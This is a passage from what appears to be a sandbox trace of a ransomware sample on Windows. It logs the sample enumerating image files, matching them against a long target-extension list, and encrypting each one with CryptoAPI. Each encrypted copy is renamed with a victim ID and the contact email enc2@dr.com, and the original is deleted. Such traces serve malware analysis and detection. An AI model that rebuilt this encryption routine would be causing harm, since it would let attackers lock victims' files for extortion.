fo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0177.015] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.016] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.016] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.016] ReadFile (in: hFile=0x388, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x1b1, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18b350*=0x1b1, lpOverlapped=0x0) returned 1
	[0177.019] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.019] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcbaa0) returned 1
	[0177.021] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.022] CryptCreateHash (in: hProv=0xfcbaa0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0177.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.022] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0177.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.022] CryptDeriveKey (in: hProv=0xfcbaa0, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9430) returned 1
	[0177.022] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.022] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1b1, dwBufLen=0x1b1 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x1c0) returned 1
	[0177.023] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.023] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x1b1 | out: Destination=0xfdc770) 
	[0177.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.023] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x18aefc*=0x1b1, dwBufLen=0x1c0 | out: pbData=0xfdc770*, pdwDataLen=0x18aefc*=0x1c0) returned 1
	[0177.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.024] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0177.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.024] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0177.024] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.024] CryptReleaseContext (hProv=0xfcbaa0, dwFlags=0x0) returned 1
	[0177.025] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.025] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.027] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0177.028] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 104
	[0177.028] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0177.028] WriteFile (in: hFile=0x390, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x18b358*=0x1c0, lpOverlapped=0x0) returned 1
	[0177.031] CloseHandle (hObject=0x390) returned 1
	[0177.031] CloseHandle (hObject=0x388) returned 1
	[0177.032] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png")) returned 1
	[0177.035] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png")) returned 0
	[0177.035] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-48.png", cAlternateFileName="")) returned 1
	[0177.035] lstrcmpW (lpString1="user-48.png", lpString2="..") returned 1
	[0177.035] lstrcmpW (lpString1="user-48.png", lpString2=".") returned 1
	[0177.035] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0177.036] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="user-48.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png"
	[0177.036] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png") returned 62
	[0177.036] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.036] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png") returned 0x3e
	[0177.036] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.036] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.036] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png") returned="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png"
	[0177.037] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png") returned 62
	[0177.037] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.037] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0177.037] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.038] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0177.038] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.038] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.038] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.039] ReadFile (in: hFile=0x388, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x1f5, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18b350*=0x1f5, lpOverlapped=0x0) returned 1
	[0177.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.048] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb088) returned 1
	[0177.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.050] CryptCreateHash (in: hProv=0xfcb088, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0177.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.051] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0177.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.051] CryptDeriveKey (in: hProv=0xfcb088, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb93f0) returned 1
	[0177.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.051] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1f5, dwBufLen=0x1f5 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x200) returned 1
	[0177.052] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.052] RtlMoveMemory (in: Destination=0xfd3760, Source=0xfdc138, Length=0x1f5 | out: Destination=0xfd3760) 
	[0177.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.052] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfd3760*, pdwDataLen=0x18aefc*=0x1f5, dwBufLen=0x200 | out: pbData=0xfd3760*, pdwDataLen=0x18aefc*=0x200) returned 1
	[0177.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.053] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0177.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.053] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0177.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.053] CryptReleaseContext (hProv=0xfcb088, dwFlags=0x0) returned 1
	[0177.054] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.054] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.055] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0177.056] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 104
	[0177.056] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0177.057] WriteFile (in: hFile=0x390, lpBuffer=0xfd3760*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfd3760*, lpNumberOfBytesWritten=0x18b358*=0x200, lpOverlapped=0x0) returned 1
	[0177.060] CloseHandle (hObject=0x390) returned 1
	[0177.060] CloseHandle (hObject=0x388) returned 1
	[0177.060] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png")) returned 1
	[0177.063] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png")) returned 0
	[0177.064] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x93038, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 1
	[0177.064] lstrcmpW (lpString1="user.bmp", lpString2="..") returned 1
	[0177.064] lstrcmpW (lpString1="user.bmp", lpString2=".") returned 1
	[0177.064] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0177.064] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="user.bmp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp"
	[0177.064] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp") returned 59
	[0177.064] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.065] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp") returned 0x3b
	[0177.065] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.065] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.065] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp") returned="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"
	[0177.065] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp") returned 59
	[0177.065] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.066] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0177.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.066] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.